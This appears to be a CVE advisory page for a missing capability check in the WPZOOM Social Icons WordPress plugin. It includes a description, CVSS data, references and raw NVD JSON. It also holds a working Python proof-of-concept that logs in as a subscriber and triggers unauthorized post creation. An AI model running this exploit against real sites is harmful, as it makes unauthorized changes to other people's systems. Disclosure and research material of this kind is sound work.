CVE-2026-4063

Description

The Social Icons Widget & Block by WPZOOM plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the add_menu_item() method hooked to admin_menu in all versions up to, and including, 4.5.8. This is due to the method performing wp_insert_post() and update_post_meta() calls to create a sharing configuration without verifying the current user has administrator-level capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the creation of a published wpzoom-sharing configuration post with default sharing button settings, which causes social sharing buttons to be automatically injected into all post content on the frontend via the the_content filter.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Social Icons Widget by WPZOOM <= 4.5.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4063 PoC - WPZOOM Social Icons Plugin Privilege Bypass
# Target: WordPress site with vulnerable WPZOOM Social Icons Widget plugin (<=4.5.8)

def check_vulnerability(target_url, username, password):
    """
    Check if target WordPress site is vulnerable to CVE-2026-4063
    This vulnerability allows low-privilege users to trigger sharing configuration creation
    """
    session = requests.Session()
    
    # Step 1: Login with low-privilege user (subscriber role)
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    resp = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    
    print("[+] Login successful as subscriber")
    
    # Step 2: Trigger the vulnerability by accessing admin pages
    # The add_menu_item() method is hooked to admin_menu
    # Any admin page access will trigger wp_insert_post()
    admin_pages = [
        '/wp-admin/index.php',
        '/wp-admin/',
        '/wp-admin/edit.php'
    ]
    
    for page in admin_pages:
        resp = session.get(f"{target_url}{page}")
        if resp.status_code == 200:
            print(f"[+] Accessed {page} - triggered vulnerability")
    
    # Step 3: Check if wpzoom-sharing post was created
    query_url = f"{target_url}/wp-json/wp/v2/posts?search=wpzoom-sharing"
    resp = session.get(query_url)
    
    if resp.status_code == 200:
        data = resp.json()
        if data and len(data) > 0:
            print(f"[!] Vulnerability confirmed! Found {len(data)} sharing config post(s)")
            for post in data:
                print(f"    Post ID: {post['id']}, Title: {post['title']['rendered']}")
            return True
    
    print("[-] No sharing config found (plugin may be patched or different version)")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://example.com subscriber password123")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    check_vulnerability(target, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4063
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4063
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4063/
[4] VulDB https://vuldb.com/cve/CVE-2026-4063
[5] https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L110
[6] https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L134
[7] https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/trunk/includes/classes/class-wpzoom-social-sharing-buttons.php#L110
[8] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3481444%40social-icons-widget-by-wpzoom%2Ftrunk&old=3462717%40social-icons-widget-by-wpzoom%2Ftrunk&sfp_email=&sfph_mail=
[9] https://www.wordfence.com/threat-intel/vulnerabilities/id/6af64b51-1758-495f-b6d7-364488de9ab8?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4063", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:13.300", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Social Icons Widget & Block by WPZOOM plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the add_menu_item() method hooked to admin_menu in all versions up to, and including, 4.5.8. This is due to the method performing wp_insert_post() and update_post_meta() calls to create a sharing configuration without verifying the current user has administrator-level capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to trigger the creation of a published wpzoom-sharing configuration post with default sharing button settings, which causes social sharing buttons to be automatically injected into all post content on the frontend via the the_content filter."}, {"lang": "es", "value": "El plugin Social Icons Widget & Block de WPZOOM para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en el método add_menu_item() enganchado a admin_menu en todas las versiones hasta la 4.5.8, inclusive. Esto se debe a que el método realiza llamadas a wp_insert_post() y update_post_meta() para crear una configuración de compartición sin verificar que el usuario actual tenga capacidades de nivel de administrador. Esto hace posible que atacantes autenticados, con acceso de nivel de Suscriptor y superior, activen la creación de una publicación de configuración de compartición wpzoom publicada con la configuración predeterminada de los botones de compartición, lo que provoca que los botones de compartición social se inyecten automáticamente en todo el contenido de las publicaciones en el frontend a través del filtro the_content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L110", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/tags/4.5.8/includes/classes/class-wpzoom-social-sharing-buttons.php#L134", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/social-icons-widget-by-wpzoom/trunk/includes/classes/class-wpzoom-social-sharing-buttons.php#L110", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3481444%40social-icons-widget-by-wpzoom%2Ftrunk&old=3462717%40social-icons-widget-by-wpzoom%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6af64b51-1758-495f-b6d7-364488de9ab8?source=cve", "source": "[email protected]"}]}}